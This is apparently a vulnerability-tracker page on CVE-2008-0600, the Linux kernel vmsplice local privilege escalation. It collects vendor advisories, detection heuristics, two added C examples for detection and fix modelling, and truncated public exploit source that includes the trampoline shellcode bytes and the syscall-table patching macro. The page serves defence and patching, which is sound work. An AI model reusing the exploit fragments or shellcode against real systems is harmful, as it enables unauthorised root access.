CVE-2008-0600
Published 2008-02-12
Priority: high (P276) · CVSS 2.0: 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
Exploited in the wild · public exploit available · listed in VulnCheck KEV
EPSS: 3.54% (87.8th percentile)
The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.
Affected
69 ranges (showing 25). Every entry in this view is vendor linux, product linux_kernel, with no version range or fixed-in value populated; the affected versions are those in the description (2.6.17 through 2.6.24.1).

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | — | — |
Detection & IOCs (extracted from sources)
bytes
\x8b\x5c\x24\x04\x8b\x4c\x24\x08\x81\xfb\x69\x7a\x00\x00\x75\x02\xff\xd1\xb8\xea\xff\xff\xff\xc3
- Detect local privilege escalation via the vmsplice syscall (NR 316 on i386, NR 278 on x86_64) with an iov_len of ULONG_MAX (0xffffffff on i386, 0xffffffffffffffff on x86_64), which is the key exploit primitive for CVE-2008-0600.
- Monitor for unprivileged processes reading /proc/kallsyms to resolve kernel symbol addresses (the " sys_vm86old" pattern used by the 2.6.23 < 2.6.24 exploit (1) below to locate the syscall table entry it patches).
- The string 'vmsplice: Bad address' is not a kernel log message: it is the exploit's own stdout, printed by its die() helper with strerror(EFAULT) when a patched kernel rejects the call. It only shows up where process output or terminal sessions are captured, but where it does, it indicates a failed attempt against CVE-2008-0600.
- Detect the trampoline shellcode byte sequence used by the same exploit (1): cmp $31337,%ebx followed by an indirect call, characteristic of the vmsplice kernel-code injection payload.
- Look for MAP_FIXED anonymous mmap calls immediately followed by a vmsplice syscall from the same process. The 2.6.17 < 2.6.24.1 exploit (2) uses MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS to set up controlled page structures before triggering the vulnerability.
- The exploit targets the vmsplice_to_pipe function in fs/splice.c; kernel versions 2.6.17 through 2.6.24.1 are affected. The patch adds an access_ok(VERIFY_READ, base, len) check on each iovec.
- CVE-2008-0600 affects Linux kernel 2.6.17 through 2.6.24.1 only; Red Hat Enterprise Linux 2.1, 3, and 4 are NOT affected. Only RHEL 5 (2.6.18 based) is affected.
- The public exploit (milw0rm 5092) has bugs that cause it to segfault on some i386 systems (e.g. Athlon bare metal) but works reliably on XenU guests and some SMP systems; x86_64 exploitation requires modification of the exploit.
- Running the exploit may cause kernel instability and crashes even when exploitation is unsuccessful; do not reproduce it in production environments.
- CVE-2008-0009 and CVE-2008-0010 are distinct vmsplice vulnerabilities (vmsplice_to_user) affecting only kernels 2.6.22+; do not conflate their detection signatures with CVE-2008-0600 (vmsplice_to_pipe, 2.6.17+).
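The byte-signature and syscall-sequence heuristics above, applied to constructed input, as an added example that is not one of this page's sources. The normalised syscall record layout, the pid values and the sample "binary" are assumptions made for the example (it is not audit or strace output); the signature bytes are the ones quoted above.

```c
/* Added example, not one of the page's sources: the detection heuristics
 * for CVE-2008-0600 applied to constructed input.  Part one scans a byte
 * buffer for the trampoline signature; part two applies two syscall-sequence
 * rules to a normalised trace.  The record layout and the sample data are
 * assumptions made for this example. */
#include <stdio.h>
#include <string.h>
#include <stdbool.h>
#include <stddef.h>

/* mov 4(%esp),%ebx ; mov 8(%esp),%ecx ; cmp $31337,%ebx ; jne +2 ;
 * call *%ecx ; mov $-EINVAL,%eax ; ret  (the bytes quoted on this page) */
static const unsigned char TRAMPOLINE_SIG[] =
    "\x8b\x5c\x24\x04\x8b\x4c\x24\x08\x81\xfb\x69\x7a\x00\x00"
    "\x75\x02\xff\xd1\xb8\xea\xff\xff\xff\xc3";
#define TRAMPOLINE_LEN (sizeof(TRAMPOLINE_SIG) - 1)

/* Offset of the signature in buf, or -1.  A plain loop rather than strstr()
 * because the signature contains NUL bytes. */
long find_trampoline(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i + TRAMPOLINE_LEN <= len; i++)
        if (memcmp(buf + i, TRAMPOLINE_SIG, TRAMPOLINE_LEN) == 0)
            return (long)i;
    return -1;
}

/* One normalised syscall record (assumed layout for this example). */
enum sc_kind { SC_MMAP, SC_VMSPLICE, SC_OTHER };
struct sc_rec {
    int pid;
    enum sc_kind call;
    unsigned long mmap_flags;        /* only meaningful for SC_MMAP */
    unsigned long long max_iov_len;  /* only meaningful for SC_VMSPLICE */
};

/* Linux x86 mmap flag values: MAP_FIXED 0x10, MAP_ANONYMOUS 0x20. */
#define X_MAP_FIXED     0x10UL
#define X_MAP_ANONYMOUS 0x20UL

/* Rule 1: a vmsplice whose iovec carries iov_len == ULONG_MAX, either width. */
bool is_huge_iov_vmsplice(const struct sc_rec *r)
{
    return r->call == SC_VMSPLICE &&
           (r->max_iov_len == 0xffffffffULL ||
            r->max_iov_len == 0xffffffffffffffffULL);
}

int count_huge_iov(const struct sc_rec *recs, size_t n)
{
    int hits = 0;
    for (size_t i = 0; i < n; i++)
        hits += is_huge_iov_vmsplice(&recs[i]);
    return hits;
}

/* Rule 2: a MAP_FIXED|MAP_ANONYMOUS mmap whose next record from the same
 * pid is a vmsplice.  Records of other processes may be interleaved. */
int count_fixed_anon_then_vmsplice(const struct sc_rec *recs, size_t n)
{
    int hits = 0;
    for (size_t i = 0; i < n; i++) {
        if (recs[i].call != SC_VMSPLICE)
            continue;
        for (size_t j = i; j-- > 0; ) {          /* walk back to this pid's previous record */
            if (recs[j].pid != recs[i].pid)
                continue;
            if (recs[j].call == SC_MMAP &&
                (recs[j].mmap_flags & (X_MAP_FIXED | X_MAP_ANONYMOUS)) ==
                    (X_MAP_FIXED | X_MAP_ANONYMOUS))
                hits++;
            break;
        }
    }
    return hits;
}

/* Constructed sample trace: pid 4242 behaves like the exploit, pid 4243 is a
 * benign vmsplice user, pid 4244 does an ordinary private mmap first. */
const struct sc_rec SAMPLE_TRACE[] = {
    { 4242, SC_MMAP,     X_MAP_FIXED | X_MAP_ANONYMOUS | 0x02UL /* MAP_PRIVATE */, 0 },
    { 4244, SC_MMAP,     0x02UL /* MAP_PRIVATE only */,                           0 },
    { 4243, SC_OTHER,    0,                                                       0 },
    { 4242, SC_VMSPLICE, 0,                                  0xffffffffffffffffULL },
    { 4243, SC_VMSPLICE, 0,                                                    4096 },
    { 4244, SC_VMSPLICE, 0,                                                   65536 },
};
const size_t SAMPLE_TRACE_N = sizeof(SAMPLE_TRACE) / sizeof(SAMPLE_TRACE[0]);

/* Constructed "binary": 8 bytes of prologue, the trampoline, 2 trailing bytes. */
const unsigned char SAMPLE_BINARY[] =
    "\x55\x89\xe5\x53\x90\x90\x90\x90"
    "\x8b\x5c\x24\x04\x8b\x4c\x24\x08\x81\xfb\x69\x7a\x00\x00"
    "\x75\x02\xff\xd1\xb8\xea\xff\xff\xff\xc3"
    "\xc9\xc3";
const size_t SAMPLE_BINARY_N = sizeof(SAMPLE_BINARY) - 1;

int main(void)
{
    printf("trampoline at offset %ld\n", find_trampoline(SAMPLE_BINARY, SAMPLE_BINARY_N));
    printf("huge iov_len vmsplice hits: %d\n", count_huge_iov(SAMPLE_TRACE, SAMPLE_TRACE_N));
    printf("fixed anon mmap -> vmsplice hits: %d\n",
           count_fixed_anon_then_vmsplice(SAMPLE_TRACE, SAMPLE_TRACE_N));
    return 0;
}
```

The sequence rule deliberately looks only at the same process's previous record, so a benign vmsplice user (pid 4243) and a process that mapped without MAP_FIXED (pid 4244) do not fire; in a real deployment the record source would be the audit or tracing subsystem, and the iov_len rule needs the iovec contents, which a plain syscall-argument log does not carry.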
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 7.2 | HIGH | AV:L/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | — | 2.1 | LOW | — |
| vendor_ubuntu | — | 7.2 | HIGH | — |
| vendor_redhat | — | 2.1 | LOW | — |
GHSA
GHSA-vv62-ccxv-738x (ghsa_unreviewed · 2022-05-01 · CVSS 2.1 · LOW · CWE-94)
The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.
VulnCheck
Linux Kernel Improper Control of Generation of Code ('Code Injection') (vulncheck · 2008 · CVSS 2.1 · LOW)
The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.
Affected: Linux Kernel
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://isc.sans.edu/diary/SSH+new+brute+force+tool/9370/
Ubuntu
Linux kernel vulnerability (vendor_ubuntu · 2008-02-12 · CVSS 7.2 · HIGH)
Wojciech Purczynski discovered that the vmsplice system call did not properly perform verification of user-memory pointers. A local attacker could exploit this to overwrite arbitrary kernel memory and gain root privileges. (CVE-2008-0600)
Instructions: After a standard system upgrade you need to reboot your computer to effect the necessary changes.
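The missing pointer verification described in the advisories, modelled in userspace as an added example (this is not kernel code and not from any advisory on the page). It contrasts the pre-fix test, which only rejected a NULL iov_base, with the access_ok-style range check the patch introduced. MODEL_TASK_SIZE, the page size and the sample addresses are assumed i386-style values, and model_npages is a simplified stand-in for the page-count arithmetic a splice path performs before pinning user pages, not the kernel's function.

```c
/* Added example, not kernel code: a userspace model of the validation that
 * the CVE-2008-0600 fix introduced in fs/splice.c.  Before the fix the iovec
 * walk behind vmsplice_to_pipe() only rejected a NULL iov_base; the fix
 * replaced that test with access_ok(VERIFY_READ, base, len).  The address
 * constants are illustrative i386-style values (assumption), not taken from
 * any particular kernel configuration. */
#include <stdio.h>
#include <stdbool.h>
#include <limits.h>

#define MODEL_TASK_SIZE  0xC0000000UL   /* assumed 3G/1G split: user space ends here */
#define MODEL_PAGE_SHIFT 12
#define MODEL_PAGE_SIZE  (1UL << MODEL_PAGE_SHIFT)

/* Pre-fix check: anything but a NULL base is accepted; the length is ignored. */
bool old_iov_check(unsigned long base, unsigned long len)
{
    (void)len;
    return base != 0;
}

/* Model of access_ok(): [base, base + len) must not wrap around the address
 * space and must end at or below the user/kernel boundary.  It is a range
 * check only; an unmapped page inside the range fails later when pinned. */
bool model_access_ok(unsigned long base, unsigned long len)
{
    unsigned long end = base + len;   /* unsigned arithmetic wraps on overflow */
    if (end < base)
        return false;                 /* base + len wrapped: reject */
    return end <= MODEL_TASK_SIZE;
}

/* Post-fix check: the whole range is validated, not just the pointer. */
bool new_iov_check(unsigned long base, unsigned long len)
{
    return model_access_ok(base, len);
}

/* Simplified model of page-count arithmetic (off + len + PAGE_SIZE - 1,
 * rounded to pages), not the kernel's code.  With len == ULONG_MAX the sum
 * wraps and the count comes out as 0 or 1 instead of failing, which is why
 * the range check has to happen before this point. */
unsigned long model_npages(unsigned long base, unsigned long len)
{
    unsigned long off = base & (MODEL_PAGE_SIZE - 1);
    return (off + len + MODEL_PAGE_SIZE - 1) >> MODEL_PAGE_SHIFT;
}

static void report(const char *what, unsigned long base, unsigned long len)
{
    printf("%-24s base=%#lx len=%#lx old=%s new=%s npages=%lu\n", what, base, len,
           old_iov_check(base, len) ? "accept" : "reject",
           new_iov_check(base, len) ? "accept" : "reject",
           model_npages(base, len));
}

int main(void)
{
    report("ordinary user buffer",   0x08048000UL, 4096UL);    /* both accept */
    report("iov_len = ULONG_MAX",    0x08048000UL, ULONG_MAX); /* old accepts, new rejects */
    report("kernel address as base", 0xC0100000UL, 16UL);      /* old accepts, new rejects */
    report("NULL base",              0UL,          16UL);      /* old rejects; new: range check only */
    return 0;
}
```

The row that matters is the second one: a length of ULONG_MAX passes the NULL-only test, and the page-count arithmetic wraps to 0, so nothing downstream sees an absurd length; the range check rejects it because base + len overflows. The third row shows the other direction the old test never caught, a base that already lies above the user/kernel boundary.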
Red Hat
kernel vmsplice_to_pipe flaw (vendor_redhat · 2008-02-09 · CVSS 2.1 · LOW · CWE-119)
The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.
Statement: This issue did not affect the versions of the Linux kernel as shipped with Red Hat Enterprise Linux 2.1, 3, 4.
No detection rules found.
Exploit-DB
Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2) (exploitdb · 2008-02-09 · CVE-2008-0600)
Source excerpt, truncated; the header names in the #include lines were lost in extraction:

```c
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include
#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)
/* userspace copy of the kernel's struct page layout the exploit forges */
struct page {
	unsigned long flags;
	int count;
	int mapcount;
	unsigned long private;
	void *mapping;
	unsigned long index;
	struct { long next, prev; } lru;
};
void exit_code();
char exit_stack[1024 * 1024];
void die(char *msg, int err)
{
	printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
	fflush(stdout);
	fflush(stderr);
	exit(1);
}
#if defined (__i386__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0
```
Exploit-DB
Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1) (exploitdb · 2008-02-09 · CVE-2008-0600)
Source excerpt, truncated mid-statement; the header names in the #include lines were lost in extraction:

```c
#include
#include
#include
#include
#include
#define TARGET_PATTERN " sys_vm86old"        /* symbol looked up in /proc/kallsyms */
#define TARGET_SYSCALL 113                   /* vm86old: the syscall table slot that gets patched */
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#define gimmeroot() syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4)
#define TRAMP_CODE (void *) trampoline
#define TRAMP_SIZE ( sizeof(trampoline) - 1 )
/* trampoline written over the patched syscall: only the magic first
 * argument 31337 makes it call the second argument (kernel_code) */
unsigned char trampoline[] =
	"\x8b\x5c\x24\x04"          /* mov 0x4(%esp),%ebx */
	"\x8b\x4c\x24\x08"          /* mov 0x8(%esp),%ecx */
	"\x81\xfb\x69\x7a\x00\x00"  /* cmp $31337,%ebx */
	"\x75\x02"                  /* jne +2 */
	"\xff\xd1"                  /* call *%ecx */
	"\xb8\xea\xff\xff\xff"      /* mov $-EINVAL,%eax */
	"\xc3"                      /* ret */
;
void die(char *msg, int err)
{
	printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror
```
Bugzilla
CVE-2008-0600 kernel vmsplice_to_pipe flaw (bugzilla · 2008-02-10 · CVSS 2.1 · LOW)
A new system call named vmsplice() was introduced in the 2.6.17
release of the Linux kernel.
COSEINC reported two issues affecting vmsplice, CVE-2008-0009 and CVE-2008-0010.
On Saturday 20080210 a public exploit was released that utilised a similar flaw
in vmsplice (vmsplice_to_pipe function) to allow a local user to gain privileges
on some architectures.
See also
http://marc.info/?t=120263655300003&r=1&w=2
This issue will affect kernels 2.6.17+ and therefore affected Red Hat Enterprise
Linux 5, but not Red Hat Enterprise Linux 4, 3, or 2.1.
Discussion:
Note that there may be a little confusion as there are actually three vmsplice
issues:
CVE-2008-0009 is already fixed upstream, does not affect any RHEL, has no
public exploit. Upstream pat
Bugzilla
CVE-2008-0009 kernel: Inappropriate dereference of user-supplied memory pointers (bugzilla · 2008-02-01 · CVSS 2.1 · LOW)
Description of problem:
A new system call named vmsplice() was introduced in the 2.6.17
release of the Linux kernel.
Inappropriate dereference of user-supplied memory pointers in the
code beginning at line 1378 in the vmsplice_to_user() kernel
function (fs/splice.c):
The patch for this issue not provided by the reporter.
Discussion:
see bug #432251
---
There was a bit of confusion as the code changed since introduction 2.6.17, so
Red Hat Enterprise Linux kernels had code different to upstream.
CVE-2008-0009 and CVE-2008-0010 only affected kernels 2.6.22+ so Red Hat
Enterprise Linux was not affected
CVE-2008-0600 affected kernels 2.6.17+ so affects Red Hat Enterprise Linux 5.
Closing this CVE-2008-000
References
- http://lists.opensuse.org/opensuse-security-announce/2008-02/msg00005.html
- http://lists.opensuse.org/opensuse-security-announce/2008-03/msg00002.html
- http://lists.opensuse.org/opensuse-security-announce/2008-06/msg00006.html
- http://marc.info/?l=linux-kernel&m=120263652322197&w=2
- http://marc.info/?l=linux-kernel&m=120264520431307&w=2
- http://marc.info/?l=linux-kernel&m=120264773202422&w=2
- http://marc.info/?l=linux-kernel&m=120266328220808&w=2
- http://marc.info/?l=linux-kernel&m=120266353621139&w=2
- http://secunia.com/advisories/28835
- http://secunia.com/advisories/28858
- http://secunia.com/advisories/28875
- http://secunia.com/advisories/28889
- http://secunia.com/advisories/28896
- http://secunia.com/advisories/28912
- http://secunia.com/advisories/28925
- http://secunia.com/advisories/28933
- http://secunia.com/advisories/28937
- http://secunia.com/advisories/29245
- http://secunia.com/advisories/30818
- http://securitytracker.com/id?1019393
- http://wiki.rpath.com/Advisories:rPSA-2008-0052
- http://wiki.rpath.com/wiki/Advisories:rPSA-2008-0052
- http://www.debian.org/security/2008/dsa-1494
- http://www.mandriva.com/security/advisories?name=MDVSA-2008:043
- http://www.mandriva.com/security/advisories?name=MDVSA-2008:044
- http://www.redhat.com/support/errata/RHSA-2008-0129.html
- http://www.securityfocus.com/archive/1/488009/100/0/threaded
- http://www.securityfocus.com/bid/27704
- http://www.securityfocus.com/bid/27801
- http://www.ubuntu.com/usn/usn-577-1
- http://www.vupen.com/english/advisories/2008/0487/references
- https://bugzilla.redhat.com/show_bug.cgi?id=432229
- https://bugzilla.redhat.com/show_bug.cgi?id=432517
- https://issues.rpath.com/browse/RPL-2237
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11358
- https://www.exploit-db.com/exploits/5092
- https://www.redhat.com/archives/fedora-package-announce/2008-February/msg00254.html
- https://www.redhat.com/archives/fedora-package-announce/2008-February/msg00255.html
- https://www.redhat.com/archives/fedora-package-announce/2008-February/msg00270.html
- https://www.redhat.com/archives/fedora-package-announce/2008-February/msg00485.html